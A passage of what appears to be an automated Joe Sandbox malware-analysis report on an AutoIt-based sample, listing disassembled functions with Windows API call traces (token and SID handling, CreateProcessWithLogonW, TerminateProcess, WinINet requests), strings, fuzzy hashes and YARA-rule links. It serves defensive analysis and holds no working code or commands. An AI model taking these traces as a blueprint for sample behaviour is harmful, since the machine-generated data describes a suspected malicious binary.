Part of subcall function 009B85F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 009B863E

GetLengthSid.ADVAPI32(?,00000000,009B8977), ref: 009B8DAC
GetProcessHeap.KERNEL32(00000008,00000000), ref: 009B8DB8
HeapAlloc.KERNEL32(00000000), ref: 009B8DBF
CopySid.ADVAPI32(00000000,00000000,?), ref: 009B8DD8
GetProcessHeap.KERNEL32(00000000,00000000,009B8977), ref: 009B8DEC
HeapFree.KERNEL32(00000000), ref: 009B8DF3

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 4b52e18932d9034fd80990f3bfbc61ec7442014762b7bd8da39f5768dc1a4829
Instruction ID: ee10217997abc84808d391dfab31f11d45aa1f9087e76e9be582d503bc503285
Opcode Fuzzy Hash: 4b52e18932d9034fd80990f3bfbc61ec7442014762b7bd8da39f5768dc1a4829
Instruction Fuzzy Hash: 8111AF31514609FFDB109F64CD59BEF776DEF99326F10402AE84597290CB319D00DB60

Uniqueness

Uniqueness Score: -1.00%

Function 009B8AF9 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 009B8B2A
OpenProcessToken.ADVAPI32(00000000), ref: 009B8B31
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 009B8B40
CloseHandle.KERNEL32(00000004), ref: 009B8B4B
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 009B8B7A
DestroyEnvironmentBlock.USERENV(00000000), ref: 009B8B8E

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 3f533df7d78eeb777f99ebcae3ff1873bcb335c3ca2ec690d5de4d686cc6f47c
Instruction ID: 87e53ac294495c0a4bd04fa1e8282db4a56a3eacbc0ba3524dd6a75ad1b78f3b
Opcode Fuzzy Hash: 3f533df7d78eeb777f99ebcae3ff1873bcb335c3ca2ec690d5de4d686cc6f47c
Instruction Fuzzy Hash: 5D1147B2515249ABDB018FA4ED89FEA7BADEF48314F044065FA04A6160C7768E60EB60

Uniqueness

Uniqueness Score: -1.00%

Function 009EC19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 009612F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0096134D
Part of subcall function 009612F3: SelectObject.GDI32(?,00000000), ref: 0096135C
Part of subcall function 009612F3: BeginPath.GDI32(?), ref: 00961373
Part of subcall function 009612F3: SelectObject.GDI32(?,00000000), ref: 0096139C

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 009EC1C4
LineTo.GDI32(00000000,00000003,?), ref: 009EC1D8
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 009EC1E6
LineTo.GDI32(00000000,00000000,?), ref: 009EC1F6
EndPath.GDI32(00000000), ref: 009EC206
StrokePath.GDI32(00000000), ref: 009EC216

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 44b9c13feef21e8bd1d28f2596fa3c6e9c04936bc937b8635766dd6c1fbe73f4
Instruction ID: 703411f24a876ae8bfbbfefdd47751230fcc276038dc0180d1733f26c69f587a
Opcode Fuzzy Hash: 44b9c13feef21e8bd1d28f2596fa3c6e9c04936bc937b8635766dd6c1fbe73f4
Instruction Fuzzy Hash: DB111B7640414CFFDF129F95DC88FAA7FADFB08354F048026BA184A161C7719E55EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 009803A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 009803D3
MapVirtualKeyW.USER32(00000010,00000000), ref: 009803DB
MapVirtualKeyW.USER32(000000A0,00000000), ref: 009803E6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 009803F1
MapVirtualKeyW.USER32(00000011,00000000), ref: 009803F9
MapVirtualKeyW.USER32(00000012,00000000), ref: 00980401

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 1083af9b1c8a085c1a72966f008ff145fa48365030788d43d8f3a089c36fb9fd
Instruction ID: 19e373fa8d6b581dbb484b1c3b89e7bd92cf471ae6b83a90461989590ba2832d
Opcode Fuzzy Hash: 1083af9b1c8a085c1a72966f008ff145fa48365030788d43d8f3a089c36fb9fd
Instruction Fuzzy Hash: 75016CB09017597DE3008F5A8C85B52FFA8FF19754F00411BA15C4B941C7F5AC64CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 009C568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 009C569B
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 009C56B1
GetWindowThreadProcessId.USER32(?,?), ref: 009C56C0
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009C56CF
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009C56D9
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009C56E0

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 6bd225658dcfe2a0e487ee5533d29f979bd81c41788cc33b81a178525a3f2222
Instruction ID: 4de52a7983e7ff0c3da34f065558aed7da62b6248edcd2be705985854a0b75ca
Opcode Fuzzy Hash: 6bd225658dcfe2a0e487ee5533d29f979bd81c41788cc33b81a178525a3f2222
Instruction Fuzzy Hash: E3F0903225919CBBE7205BA2DC4DEEF7B7CEFC6B11F00016AFA00D5090D7A01E0196B5

Uniqueness

Uniqueness Score: -1.00%

Function 009C74D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 009C74E5
EnterCriticalSection.KERNEL32(?,?,00971044,?,?), ref: 009C74F6
TerminateThread.KERNEL32(00000000,000001F6,?,00971044,?,?), ref: 009C7503
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00971044,?,?), ref: 009C7510

Part of subcall function 009C6ED7: CloseHandle.KERNEL32(00000000,?,009C751D,?,00971044,?,?), ref: 009C6EE1

InterlockedExchange.KERNEL32(?,000001F6), ref: 009C7523
LeaveCriticalSection.KERNEL32(?,?,00971044,?,?), ref: 009C752A

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 75fc37f3d77fcd79c4163417b0e354804d088e2e57fcf2ec23468c99df75adb9
Instruction ID: a3be7a93ec0b0f8f4268c09a5e6b4f853baba0b1cc82a302eb78f1fbc8aa9906
Opcode Fuzzy Hash: 75fc37f3d77fcd79c4163417b0e354804d088e2e57fcf2ec23468c99df75adb9
Instruction Fuzzy Hash: 5CF0BE3A858A52EBEB111B64FCCCEEB772AEF48302B010137F202991B0CB711D00DB60

Uniqueness

Uniqueness Score: -1.00%

Function 009B8E74 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 009B8E7F
UnloadUserProfile.USERENV(?,?), ref: 009B8E8B
CloseHandle.KERNEL32(?), ref: 009B8E94
CloseHandle.KERNEL32(?), ref: 009B8E9C
GetProcessHeap.KERNEL32(00000000,?), ref: 009B8EA5
HeapFree.KERNEL32(00000000), ref: 009B8EAC

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 21d146d8fead2fa7ff34a6e2b93bb70f8bd86ecf8a64f89718cbe668afdf905c
Instruction ID: 4f493f989d6f2853d277519f81224fddb567eda3061782d177cb7af2a4707450
Opcode Fuzzy Hash: 21d146d8fead2fa7ff34a6e2b93bb70f8bd86ecf8a64f89718cbe668afdf905c
Instruction Fuzzy Hash: AEE0C236018445FBDA011FE1EC5C90ABB69FB89362B108232F219890B0CB329860EB50

Uniqueness

Uniqueness Score: -1.00%

Function 009D8902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 009D8928
CharUpperBuffW.USER32(?,?), ref: 009D8A37
VariantClear.OLEAUT32(?), ref: 009D8BAF

Part of subcall function 009C7804: VariantInit.OLEAUT32(00000000), ref: 009C7844
Part of subcall function 009C7804: VariantCopy.OLEAUT32(00000000,?), ref: 009C784D
Part of subcall function 009C7804: VariantClear.OLEAUT32(00000000), ref: 009C7859

Strings

Incorrect Parameter format, xrefs: 009D8960, 009D8B22
AUTOIT.ERROR, xrefs: 009D8A3D

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 9eee3315f397f3c173a853d5ba7e004a18a78c3473002ac1363e60d0f13ddf3d
Instruction ID: 0917279556cf43523590898dd8c8be08b5386f4ddea6c910b51f20bc1fff85d6
Opcode Fuzzy Hash: 9eee3315f397f3c173a853d5ba7e004a18a78c3473002ac1363e60d0f13ddf3d
Instruction Fuzzy Hash: 9F918E716083019FC700DF24C594A6BBBE8EFC9354F04896EF8968B362DB30E905CB52

Uniqueness

Uniqueness Score: -1.00%

Function 009C2F86 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0097FEC6: _wcscpy.LIBCMT ref: 0097FEE9

_memset.LIBCMT ref: 009C3077
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 009C30A6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 009C3159
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 009C3187

Strings

0, xrefs: 009C3063

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: fc843f4670f87ad628f4d102428882195f0be72891fb39abada500f094eec271
Instruction ID: d6d0bf3dc3f9dfd2dd466a42900f4b79a38d1be37af12003c6ea170106ff7919
Opcode Fuzzy Hash: fc843f4670f87ad628f4d102428882195f0be72891fb39abada500f094eec271
Instruction Fuzzy Hash: EE51AF71A0C3009ED725EF28D845F6BB7E8AF85360F08CA2DF89596291DB70CE448793

Uniqueness

Uniqueness Score: -1.00%

Function 009BDA5D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 009BDAC5
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 009BDAFB
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 009BDB0C
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 009BDB8E

Strings

DllGetClassObject, xrefs: 009BDB01

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: d37dccc637f5a79c7e997f106b453a9d50ca79328b04c488fe1c8a120310e22b
Instruction ID: 4b7e2e9e101a353af3cb9f6d6ec7c2825e56781fdbc829f51593a8c02e0aa852
Opcode Fuzzy Hash: d37dccc637f5a79c7e997f106b453a9d50ca79328b04c488fe1c8a120310e22b
Instruction Fuzzy Hash: B341C371602218EFDB14CF54C984BEA7BB9EF44320F1580AEAD099F205E7B5DE40DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 009C2C42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 009C2CAF
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 009C2CCB
DeleteMenu.USER32(?,00000007,00000000), ref: 009C2D11
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00A26890,00000000), ref: 009C2D5A

Strings

0, xrefs: 009C2CA4

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 45df426f3b70183cf47b14a3219d7e9f5441b7e16318f342b24afe147b907b93
Instruction ID: 79c8e3b695c7c484e72c55f7ee7d4c0d76d9d290d5f871a3ea21d85fc3d1c503
Opcode Fuzzy Hash: 45df426f3b70183cf47b14a3219d7e9f5441b7e16318f342b24afe147b907b93
Instruction Fuzzy Hash: 864181706043419FD720DF24D885F6AB7E8AF95320F14466EF966972E1DB70E904CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 009DDAB9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 009DDAD9

Part of subcall function 009679AB: _memmove.LIBCMT ref: 009679F9

Strings

cdecl, xrefs: 009DDB30
none, xrefs: 009DDBB4
winapi, xrefs: 009DDB4A
stdcall, xrefs: 009DDB5B

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: 48dbf99f35e3ed4cef5e899d7143c41909e58235ef2b9e643474ce00069cfa7d
Instruction ID: f9ba3dc2d5b6391e18ecf1bd2d1c1a584afb87c07170c60e80d28c57670f4e7c
Opcode Fuzzy Hash: 48dbf99f35e3ed4cef5e899d7143c41909e58235ef2b9e643474ce00069cfa7d
Instruction Fuzzy Hash: A031B470600619AFCF10EF94CC90AEEB3B4FF45314B108A2BE865977D1CB31A905CB80

Uniqueness

Uniqueness Score: -1.00%

Function 009B9372 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00967F41: _memmove.LIBCMT ref: 00967F82

Part of subcall function 009BB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 009BB0E7

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 009B93F6
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 009B9409
SendMessageW.USER32(?,00000189,?,00000000), ref: 009B9439

Part of subcall function 00967D2C: _memmove.LIBCMT ref: 00967D66

Strings

ListBox, xrefs: 009B93B5
ComboBox, xrefs: 009B9380

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: 6e7cab2529fde81cdd5849ba0ddd028f043bb19b1cfb6d085861d34242a6140d
Instruction ID: ca4c0786a85fd99ee85112f2657be4efade9b5d0f8ab900ee85174f51eb625d5
Opcode Fuzzy Hash: 6e7cab2529fde81cdd5849ba0ddd028f043bb19b1cfb6d085861d34242a6140d
Instruction Fuzzy Hash: B4212371900108BBDB14ABB0CC95EFFB77DDF85320B104529FA21A72E1DB354E0A9620

Uniqueness

Uniqueness Score: -1.00%

Function 009D1B21 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 009D1B40
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009D1B66
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 009D1B96
InternetCloseHandle.WININET(00000000), ref: 009D1BDD

Part of subcall function 009D2777: GetLastError.KERNEL32(?,?,009D1B0B,00000000,00000000,00000001), ref: 009D278C
Part of subcall function 009D2777: SetEvent.KERNEL32(?,?,009D1B0B,00000000,00000000,00000001), ref: 009D27A1

Strings

, xrefs: 009D1B87

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 3cae1af918a96d048b741fdd0b785d84821590f2dc432a080792e4d0c871ee39
Instruction ID: f488d687b2cbf018c2309eae9feb5a688791a0e264e9c5d0598889e6d2cbf650
Opcode Fuzzy Hash: 3cae1af918a96d048b741fdd0b785d84821590f2dc432a080792e4d0c871ee39
Instruction Fuzzy Hash: 2E21CFB2684208BFEB219F209CC5EBF76EDEB89744F10812BF405A6340EB399D049761

Uniqueness

Uniqueness Score: -1.00%

Function 009E6656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00961D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00961D73
Part of subcall function 00961D35: GetStockObject.GDI32(00000011), ref: 00961D87
Part of subcall function 00961D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00961D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 009E66D0
LoadLibraryW.KERNEL32(?), ref: 009E66D7
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 009E66EC
DestroyWindow.USER32(?), ref: 009E66F4

Strings

SysAnimate32, xrefs: 009E66AB

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 753dab493b06a6d9cc210f65555b86f8a15b23b7e95695a8bf962a740aeae444
Instruction ID: f3fb92fe1addb2e476e59c679d9f8c3d46ff133023631729249558e544bd6587
Opcode Fuzzy Hash: 753dab493b06a6d9cc210f65555b86f8a15b23b7e95695a8bf962a740aeae444
Instruction Fuzzy Hash: AA21CF71120285BBEF124F69EC80EBB37ADFB69BA8F100629F91096190C772CC419760

Uniqueness

Uniqueness Score: -1.00%

Function 009C703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 009C705E
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 009C7091
GetStdHandle.KERNEL32(0000000C), ref: 009C70A3
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 009C70DD

Strings

nul, xrefs: 009C70D8

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

